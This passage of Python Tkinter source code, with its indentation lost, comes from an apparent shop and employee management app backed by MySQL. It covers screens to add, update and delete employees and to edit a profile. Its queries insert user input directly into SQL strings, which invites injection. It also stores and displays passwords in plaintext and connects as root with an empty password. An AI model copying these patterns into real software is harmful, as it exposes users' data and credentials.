add_employees_label = Label(self.content_frame, text='ADD EMPLOYEES', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
add_employees_label.place(x=50, y=50)
employee_name_label = Label(self.content_frame, text='Employee Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
employee_name_label.place(x=106, y=136)
username_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
username_label.place(x=106, y=200)
password_label = Label(self.content_frame, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
password_label.place(x=106, y=260)
phone_number_label = Label(self.content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_number_label.place(x=106, y=322)
salary_label = Label(self.content_frame, text='Salary', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
salary_label.place(x=106, y=383)
designation_label = Label(self.content_frame, text='Designation', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
designation_label.place(x=106, y=446)
employee_name_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
employee_name_entry.place(x=281, y=138)
username_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
username_entry.place(x=281, y=200)
password_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
password_entry.place(x=281, y=262)
phone_number_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
phone_number_entry.place(x=281, y=324)
salary_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
salary_entry.place(x=281, y=387)
designation_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
designation_entry.place(x=281, y=448)
add_employee_button = Button(self.content_frame, cursor='hand2', image=self.add_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=add)
add_employee_button.place(x=722, y=523)
alert_label = Label(self.content_frame, width=30, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=106, y=523)
def update_employees_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#3C3F4A')
self.delete_employees_button.config(bg='#292B37')
for widget in self.content_frame.winfo_children():
widget.destroy()
def search():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
def update():
fullname = fullname_edit.get()
email = email_edit.get()
phone = phone_edit.get()
address = address_edit.get()
dob = dob_edit.get()
designation = designation_edit.get()
password = password_edit.get()
salary = salary_edit.get()
if fullname == '' or email == '' or phone == '' or address == '' or dob == '' or designation == '' or password == '' or salary == '':
alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'UPDATE user_table SET Full_Name = "{fullname}", Email = "{email}", Phone_Number = "{phone}", Address = "{address}", DOB = "{dob}", Designation = "{designation}", User_Password = "{password}", Salary = {salary} WHERE UserName = "{searched_username}";'
my_cursor.execute(query)
db.commit()
db.close()
for widget in self.update_content_frame.winfo_children():
widget.destroy()
search_edit.delete(0, 'end')
alert_label.config(text='Employee updated Successfully..', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
except Exception as e:
alert_label.config(text='Sorry! Unable to update', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
searched_username = search_edit.get()
if searched_username == '':
alert_label.config(text='Enter a Username', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
for widget in self.update_content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM user_table WHERE UserName = "{searched_username}"'
my_cursor.execute(query)
employee = my_cursor.fetchall()
if len(employee) == 0 or searched_username == 'karim':
alert_label.config(text='Employee doesn\'t exists', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
fullname = employee[0][0]
email = employee[0][1]
if email == None:
email = ''
phone = employee[0][2]
address = employee[0][3]
if address == None:
address = ''
dob = employee[0][4]
if dob == None:
dob = ''
designation = employee[0][5]
password = employee[0][7]
salary = employee[0][8]
update_employee_content_bg_label = Label(self.update_content_frame, image=self.update_employee_content_bg_image, bd=0)
update_employee_content_bg_label.place(x=0, y=0)
fullname_label = Label(self.update_content_frame, text='Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
fullname_label.place(x=14, y=37)
password_label = Label(self.update_content_frame, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
password_label.place(x=14, y=107)
designation_label = Label(self.update_content_frame, text='Designation', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
designation_label.place(x=14, y=177)
salary_label = Label(self.update_content_frame, text='Salary', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
salary_label.place(x=14, y=243)
email_label = Label(self.update_content_frame, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label.place(x=475, y=37)
address_label = Label(self.update_content_frame, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label.place(x=475, y=111)
phone_label = Label(self.update_content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label.place(x=475, y=177)
dob_label = Label(self.update_content_frame, text='Date of birth', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dob_label.place(x=475, y=243)
fullname_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
fullname_edit.place(x=135, y=39)
password_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
password_edit.place(x=135, y=109)
designation_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
designation_edit.place(x=135, y=179)
salary_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
salary_edit.place(x=135, y=248)
email_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
email_edit.place(x=625, y=39)
address_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
address_edit.place(x=625, y=109)
phone_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
phone_edit.place(x=625, y=179)
dob_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
dob_edit.place(x=625, y=248)
fullname_edit.delete(0, 'end')
password_edit.delete(0, 'end')
designation_edit.delete(0, 'end')
salary_edit.delete(0, 'end')
email_edit.delete(0, 'end')
address_edit.delete(0, 'end')
phone_edit.delete(0, 'end')
dob_edit.delete(0, 'end')
fullname_edit.insert(0, fullname)
password_edit.insert(0, password)
designation_edit.insert(0, designation)
salary_edit.insert(0, salary)
email_edit.insert(0, email)
address_edit.insert(0, address)
phone_edit.insert(0, phone)
dob_edit.insert(0, dob)
update_button = Button(self.update_content_frame, cursor='hand2', image=self.update_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=update)
update_button.place(x=755, y=310)
except Exception as e:
alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
self.update_employee_bg_label = Label(self.content_frame, image=self.update_employee_bg_image)
self.update_employee_bg_label.place(x=-2, y=-2)
update_employee_label = Label(self.content_frame, text='UPDATE EMPLOYEE', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
update_employee_label.place(x=50, y=40)
username_search_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
username_search_label.place(x=220, y=90)
search_edit = Entry(self.content_frame, width=41, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
search_edit.place(x=332, y=90)
search_edit.delete(0, 'end')
search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
search_button.place(x=680, y=78)
self.update_content_frame = Frame(self.content_frame, width=938, height=387, bg='#292B37') # bg='#292B37'
self.update_content_frame.place(x=22, y=186)
alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=90, y=560)
def delete_employees_button_clicked():
self.dashboard_button.config(bg='#292B37')
self.show_products_button.config(bg='#292B37')
self.add_products_button.config(bg='#292B37')
self.update_products_button.config(bg='#292B37')
self.delete_products_button.config(bg='#292B37')
self.sales_button.config(bg='#292B37')
self.selling_history_button.config(bg='#292B37')
self.show_employees_button.config(bg='#292B37')
self.add_employees_button.config(bg='#292B37')
self.update_employees_button.config(bg='#292B37')
self.delete_employees_button.config(bg='#3C3F4A')
for widget in self.content_frame.winfo_children():
widget.destroy()
def search():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
def delete():
user_response = messagebox.askokcancel('Confirm Deletion', 'Do you want to delete the Employee ?')
if user_response:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'DELETE FROM user_table WHERE UserName = "{searched_username}";'
my_cursor.execute(query)
db.commit()
db.close()
for widget in self.delete_content_frame.winfo_children():
widget.destroy()
search_edit.delete(0, 'end')
alert_label.config(text='Successfully deleted the employee', bg='#2FA422', fg='white')
self.content_frame.after(1500, disappear_alert_label)
except Exception as e:
alert_label.config(text='Sorry! Unable to delete', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
pass
searched_username = search_edit.get()
if searched_username == '':
alert_label.config(text='Enter a Username', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
for widget in self.delete_content_frame.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM user_table WHERE UserName = "{searched_username}"'
my_cursor.execute(query)
employee = my_cursor.fetchall()
if len(employee) == 0 or searched_username == 'karim':
alert_label.config(text='Employee doesn\'t exists', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
fullname = employee[0][0]
email = employee[0][1]
if email == None:
email = ''
phone = employee[0][2]
address = employee[0][3]
if address == None:
address = ''
dob = employee[0][4]
if dob == None:
dob = ''
designation = employee[0][5]
password = employee[0][7]
salary = employee[0][8]
fullname_label = Label(self.delete_content_frame, text='Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
fullname_label.place(x=202, y=22)
password_label = Label(self.delete_content_frame, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
password_label.place(x=202, y=66)
designation_label = Label(self.delete_content_frame, text='Designation', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
designation_label.place(x=202, y=110)
salary_label = Label(self.delete_content_frame, text='Salary', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
salary_label.place(x=202, y=154)
email_label = Label(self.delete_content_frame, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label.place(x=202, y=198)
address_label = Label(self.delete_content_frame, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label.place(x=202, y=242)
phone_label = Label(self.delete_content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label.place(x=202, y=286)
dob_label = Label(self.delete_content_frame, text='Date of birth', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dob_label.place(x=202, y=330)
fullname_label1 = Label(self.delete_content_frame, text=fullname, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
fullname_label1.place(x=350, y=22)
password_label1 = Label(self.delete_content_frame, text=password, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
password_label1.place(x=350, y=66)
designation_label1 = Label(self.delete_content_frame, text=designation, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
designation_label1.place(x=350, y=110)
salary_label1 = Label(self.delete_content_frame, text=salary, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
salary_label1.place(x=350, y=154)
email_label1 = Label(self.delete_content_frame, text=email, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label1.place(x=350, y=198)
address_label1 = Label(self.delete_content_frame, text=address, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label1.place(x=350, y=242)
phone_label1 = Label(self.delete_content_frame, text=phone, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label1.place(x=350, y=286)
dob_label1 = Label(self.delete_content_frame, text=dob, font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dob_label1.place(x=350, y=330)
# fullname_edit.delete(0, 'end')
# password_edit.delete(0, 'end')
# designation_edit.delete(0, 'end')
# salary_edit.delete(0, 'end')
# email_edit.delete(0, 'end')
# address_edit.delete(0, 'end')
# phone_edit.delete(0, 'end')
# dob_edit.delete(0, 'end')
#
# fullname_edit.insert(0, fullname)
# password_edit.insert(0, password)
# designation_edit.insert(0, designation)
# salary_edit.insert(0, salary)
# email_edit.insert(0, email)
# address_edit.insert(0, address)
# phone_edit.insert(0, phone)
# dob_edit.insert(0, dob)
delete_button = Button(self.delete_content_frame, cursor='hand2', image=self.delete_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=delete)
delete_button.place(x=640, y=380)
except Exception as e:
alert_label.config(text='Sorry! Something went wrong..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in self.content_frame.winfo_children():
widget.destroy()
self.delete_employee_bg_label = Label(self.content_frame, image=self.update_employee_bg_image)
self.delete_employee_bg_label.place(x=-2, y=-2)
delete_employee_label = Label(self.content_frame, text='DELETE EMPLOYEE', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
delete_employee_label.place(x=50, y=40)
username_search_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
username_search_label.place(x=220, y=90)
search_edit = Entry(self.content_frame, width=41, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
search_edit.place(x=332, y=90)
search_edit.delete(0, 'end')
search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=search)
search_button.place(x=680, y=78)
self.delete_content_frame = Frame(self.content_frame, width=938, height=446, bg='#292B37') # bg='#292B37'
self.delete_content_frame.place(x=22, y=154)
alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=90, y=560)
def logout():
user_response = messagebox.askyesno('Confirm Logout', 'Do you really want to logout ?')
if user_response:
try:
self.Login_Page = QtWidgets.QMainWindow()
self.ui = Login_Page.Ui_Login_Window()
self.ui.setupUi(self.Login_Page)
self.root.destroy()
self.Login_Page.show()
except Exception as e:
print(e)
else:
pass
def profile():
def edit():
def disappear_alert_label():
try:
alert_label.config(bg='#292B37', fg='#292B37')
except Exception as e:
pass
def save():
name = fullname_entry.get()
password = password_entry.get()
phone = phone_entry.get()
email = email_entry.get()
address = address_entry.get()
dob = dob_entry.get()
if name == '' or password == '' or phone == '' or email == '' or address == '' or dob == '':
alert_label.config(text='Fill up all the fields..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
else:
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'UPDATE user_table SET Full_Name="{name}", User_Password="{password}", Phone_Number="{phone}", Email="{email}", Address="{address}", DOB="{dob}" WHERE UserName="{self.username}"'
my_cursor.execute(query)
db.commit()
for widget in prof.winfo_children():
widget.destroy()
profile_content()
except Exception as e:
alert_label.config(text='Sorry! Unable to edit..', bg='#AA2F2F', fg='white')
self.content_frame.after(1500, disappear_alert_label)
for widget in prof.winfo_children():
widget.destroy()
edit_profile_bg_label = Label(prof, image=self.edit_profile_bg_image)
edit_profile_bg_label.place(x=-2, y=-2)
edit_profile_label = Label(prof, text='EDIT PROFILE', font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='#BBBBBB')
edit_profile_label.place(x=40, y=40)
fullname_label = Label(prof, text=f'Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
fullname_label.place(x=72, y=110)
password_label = Label(prof, text=f'Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
password_label.place(x=72, y=159)
phone_label = Label(prof, text=f'Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label.place(x=72, y=207)
email_label = Label(prof, text=f'E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label.place(x=72, y=255)
address_label = Label(prof, text=f'Address', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label.place(x=72, y=303)
dob_label = Label(prof, text=f'Date of birth', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dob_label.place(x=72, y=352)
fullname_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=40)
fullname_entry.place(x=198, y=110)
password_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0,)
password_entry.place(x=198, y=159)
phone_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0,)
phone_entry.place(x=198, y=207)
email_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0,)
email_entry.place(x=198, y=255)
address_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0,)
address_entry.place(x=198, y=303)
dob_entry = Entry(prof, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0,)
dob_entry.place(x=198, y=352)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
user_details = my_cursor.fetchall()
fullname_entry.insert(0, user_details[0][0])
password_entry.insert(0, user_details[0][7])
phone_entry.insert(0, user_details[0][2])
email_entry.insert(0, user_details[0][1])
address_entry.insert(0, user_details[0][3])
dob_entry.insert(0, user_details[0][4])
except Exception as e:
print(e)
save_button = Button(prof, cursor='hand2', image=self.save_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=save)
save_button.place(x=482, y=441)
cancel_button = Button(prof, cursor='hand2', image=self.cancel_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=profile_content)
cancel_button.place(x=387, y=441)
alert_label = Label(prof, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
alert_label.place(x=40, y=435)
def profile_content():
for widget in prof.winfo_children():
widget.destroy()
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT * FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
user_details = my_cursor.fetchall()
profile_label = Label(prof, text='PROFILE', font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='#BBBBBB')
profile_label.place(x=50, y=48)
name_label = Label(prof, text=user_details[0][0], font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='white')
name_label.place(x=76, y=109)
designation_label = Label(prof, text=user_details[0][5], font=('Arial Rounded MT', 12, 'bold'), bg='#292B37', fg='white')
designation_label.place(x=76, y=150)
username_label = Label(prof, text=f'Username {user_details[0][6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
username_label.place(x=76, y=231)
phone_label = Label(prof, text=f'Phone Number {user_details[0][2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
phone_label.place(x=76, y=269)
email_label = Label(prof, text=f'E-mail {user_details[0][1]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
email_label.place(x=76, y=307)
address_label = Label(prof, text=f'Address {user_details[0][3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
address_label.place(x=76, y=345)
dob_label = Label(prof, text=f'Date of birth {user_details[0][4]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
dob_label.place(x=76, y=384)
edit_button = Button(prof, cursor='hand2', image=self.edit_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=edit)
edit_button.place(x=450, y=45)
except Exception as e:
print(e)
prof = Toplevel()
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
start_width = int((screen_width - 600) / 2)
start_height = int((screen_height - 500) / 2)
prof.title('User Profile')
prof.iconbitmap(directory_path + '/images/logo.ico')
prof.geometry(f'600x500+{start_width}+{start_height - 30}')
prof.resizable(False, False)
prof.config(bg='#292B37')
profile_content()
self.main_background_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/main_bg.png'))
self.dashboard_logo_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/dashboard_logo.png'))
self.dashboard_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/dashboard_bg.png'))
self.notification_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/notification_img.png'))
self.user_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/user_icon.png'))
self.logout_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/logout_img.png'))
self.add_products_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_product_bg.png'))
self.add_products_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_product_button.png'))
self.update_product_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_product_bg.png'))
self.search_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/search_button_img.png'))
self.update_content_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_content.png'))
self.update_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_button_img.png'))
self.delete_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/delete_button_img.png'))
self.add_employees_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_employee_bg.png'))
self.add_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/add_employee_button_img.png'))
self.update_employee_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_bg.png'))
self.update_employee_content_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_content.png'))
self.update_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/update_employee_button_img.png'))
self.delete_employee_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/delete_employee_button.png'))
self.show_employees_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/show_employees_title_bg.png'))
self.show_employee_bg_image = ImageTk.PhotoImage( Image.open(directory_path + '/images/show_employee_bg.png'))
self.sales_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/sales_bg.png'))
self.ok_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/ok_button.png'))
self.search_button_icon_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/search_icon.png'))
self.selling_history_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/selling_history_bg.png'))
self.edit_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/edit_button_img.png'))
self.edit_profile_bg_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/owner_edit_profile_bg.png'))
self.save_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/save_button.png'))
self.cancel_button_image = ImageTk.PhotoImage(Image.open(directory_path + '/images/cancel_button.png'))
self.main_background_label = Label(self.root, image=self.main_background_image)
self.main_background_label.place(x=-2, y=-2)
try:
db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
my_cursor = db.cursor()
query = f'SELECT Full_Name FROM user_table WHERE UserName = "{self.username}"'
my_cursor.execute(query)
fullname = my_cursor.fetchone()[0]
except Exception as e:
print(e)
self.profile_button = Button(self.root, cursor='hand2', image=self.user_icon_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=profile)
self.profile_button.place(x=930, y=25)
self.profile_name_label = Label(self.root, text=fullname, anchor='w', width=25, font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#BBBBBB')
self.profile_name_label.place(x=962, y=28)
self.logout_button = Button(self.root, cursor='hand2', image=self.logout_icon_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=logout)
self.logout_button.place(x=1200, y=22)
self.content_frame = Frame(self.root, width=980, height=630, bg='#292B37') #bg='#292B37'
self.content_frame.place(x=278, y=64)
self.dashboard_bg_label = Label(self.content_frame, image=self.dashboard_bg_image)
self.dashboard_bg_label.place(x=-2, y=-2)
self.side_frame = Frame(self.root, width=255, height=425, bg='#292B37') # bg='#292B37'
self.side_frame.place(x=18, y=255)
temp_frame = Frame(self.side_frame, width=230, height=421, bg='#292B37', border=None)
temp_frame.place(x=2, y=2)
showall_canvas = Canvas(temp_frame, width=230, height=421, bg='#292B37')
vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
vertical_bar.pack(side=RIGHT, fill='y')
showall_canvas.config(yscrollcommand=vertical_bar.set)
final_frame = Frame(temp_frame, width=230, height=421, bg='#292B37')
showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
final_frame.bind('<Enter>', bound_to_mousewheel)
final_frame.bind('<Leave>', unbound_to_mousewheel)
border_hide_label1 = Label(self.root, bg='#292B37', height=28, width=-1)
border_hide_label1.place(x=17, y=255)
border_hide_label2 = Label(self.root, bg='#292B37', height=0, width=36)
border_hide_label2.place(x=16, y=238)
border_hide_label3 = Label(self.root, bg='#292B37', height=28, width=-1)
border_hide_label3.place(x=248, y=255)
showall_canvas.config(yscrollcommand=vertical_bar.set)
showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
self.dashboard_button = Button(final_frame, text='DASHBOARD ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#3C3F4A', borderwidth=0, activebackground='#333640', activeforeground='white', command=dashboard_button_clicked)
self.dashboard_button.pack()
self.show_products_button = Button(final_frame, text='SHOW PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=show_products_button_clicked)
self.show_products_button.pack()
self.add_products_button = Button(final_frame, text='ADD PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=add_products_button_clicked)
self.add_products_button.pack()
self.update_products_button = Button(final_frame, text='UPDATE PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=update_products_button_clicked)
self.update_products_button.pack()
self.delete_products_button = Button(final_frame, text='DELETE PRODUCTS ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=delete_products_button_clicked)
self.delete_products_button.pack()
self.sales_button = Button(final_frame, text='SALES ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=sales_button_clicked)
self.sales_button.pack()
self.selling_history_button = Button(final_frame, text='SELLING HISTORY ', cursor='hand2', font=('Arial Rounded MT', 11, 'bold'), height=2, width=25, fg='white', bg='#292B37', borderwidth=0, activebackground='#333640', activeforeground='white', command=selling_history_button_clicked)
self.selling_history_button.pack()
